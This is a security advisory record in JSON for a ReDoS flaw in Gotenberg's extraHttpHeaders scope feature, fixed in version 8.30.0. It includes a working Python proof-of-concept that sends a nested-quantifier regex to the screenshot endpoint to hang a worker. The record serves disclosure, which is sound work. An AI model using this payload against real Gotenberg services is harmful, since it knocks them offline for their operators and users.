{"id":"GHSA-fmwg-qcqh-m992","summary":"Gotenberg Vulnerable to ReDoS via extraHttpHeaders scope feature","details":"### Summary\nGotenberg uses `dlclark/regexp2` to compile user-supplied scope patterns without setting a proper timeout. Users with access to features using this logic can hang workers indefinitely. \n\n### Details\nGotenberg uses `dlclark/regexp2` to compile user-supplied scope patterns (gotenberg/pkg/modules/chromium/routes.go:200) with no MatchTimeout set, therefore using the default of math.MaxInt64 = \"forever\".\n\nFor example, any user with access to the endpoint `/forms/chromium/screenshot/url` can add a crafted scope pattern to the `extraHttpHeaders` form field using a nested quantifiers that causes infinite backtracking, hanging the Gotenberg worker indefinitely.\n\nSee the [dlclark/regexp2 README.md](https://github.com/dlclark/regexp2?tab=readme-ov-file#catastrophic-backtracking-and-timeouts) for further considerations.\n\nTested on the latest container version gotenberg/gotenberg:8.29.1\n\n### PoC\n\nThe following Python script uses the `/forms/chromium/screenshot/url` endpoint, testing for differences in responses times between simple and malicious regexes.\n\n```python\n#!/usr/bin/env -S uv run --script\n# /// script\n# requires-python = \"\u003e=3.12\"\n# dependencies = [\n#    \"requests\",\n# ]\n# ///\nimport json\nimport time\nimport requests\n\nHOST = \"localhost:3000\"\n# HOST = \"gotenberg.local:3000\"\n\ndef send_request(host: str, headers_dict: dict, label: str, timeout: int = 30):\n    \"\"\"Send a screenshot request to Gotenberg and measure response time.\"\"\"\n    url = f\"http://{host}/forms/chromium/screenshot/url\"\n    print(f\"\\n[*] {label}\")\n    print(f\"    extraHttpHeaders: {json.dumps(headers_dict)}\")\n\n    start = time.time()\n    try:\n        r = requests.post(\n            url,\n            data={\n                \"url\": \"http://api.service:3000/snapshot/\",\n                \"extraHttpHeaders\": json.dumps(headers_dict),\n            },\n            files={\"a\": \"b\"},\n            timeout=timeout,\n        )\n        elapsed = time.time() - start\n        print(f\"    Status: {r.status_code}, Size: {len(r.content)}, Time: {elapsed:.2f}s\")\n    except requests.exceptions.Timeout:\n        elapsed = time.time() - start\n        print(f\"    TIMEOUT after {elapsed:.2f}s — Gotenberg worker is hung (ReDoS confirmed)\")\n    except requests.exceptions.ConnectionError as e:\n        elapsed = time.time() - start\n        print(f\"    CONNECTION ERROR after {elapsed:.2f}s: {e}\")\n\n\ndef main():\n    # --- Test 1: Baseline ---\n    send_request(HOST, {\"X-Test\": \"baseline\"}, \"Baseline: no scope\")\n\n    # --- Test 2: Simple scope ---\n    send_request(HOST, {\"X-Test\": \"value; scope=.*\"}, \"Simple scope: '.*'\")\n\n    # --- Test 3: ReDoS scope ---\n    # Classic evil pattern: nested quantifiers on overlapping character class.\n    evil_pattern = r\"([a-zA-Z0-9.:/_]+)+\\!\"\n    send_request(\n        HOST,\n        {\"X-Test\": f\"value; scope={evil_pattern}\"},\n        f\"ReDoS scope: '{evil_pattern}'\",\n        timeout=15,\n    )\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\n### Impact\n\nThis is a ReDoS vulnerability which only impacts the availability of the service and/or server on which gotenberg is running. All instances where attackers can reach the `/forms/chromium/screenshot/url` endpoint specifing the `extraHttpHeaders` field are affected.","aliases":["CVE-2026-35458","GO-2026-5372"],"modified":"2026-06-25T19:56:29.741737466Z","published":"2026-04-07T18:16:19Z","database_specific":{"nvd_published_at":"2026-04-07T15:17:43Z","cwe_ids":["CWE-1333"],"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-04-07T18:16:19Z"},"references":[{"type":"WEB","url":"https://github.com/gotenberg/gotenberg/security/advisories/GHSA-fmwg-qcqh-m992"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35458"},{"type":"WEB","url":"https://github.com/gotenberg/gotenberg/commit/cfb48d9af48cb236244eabe5c67fe1d30fb3fe25"},{"type":"PACKAGE","url":"https://github.com/gotenberg/gotenberg"}],"affected":[{"package":{"name":"github.com/gotenberg/gotenberg/v8","ecosystem":"Go","purl":"pkg:golang/github.com/gotenberg/gotenberg/v8"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"8.30.0"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 8.29.1","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-fmwg-qcqh-m992/GHSA-fmwg-qcqh-m992.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"}]}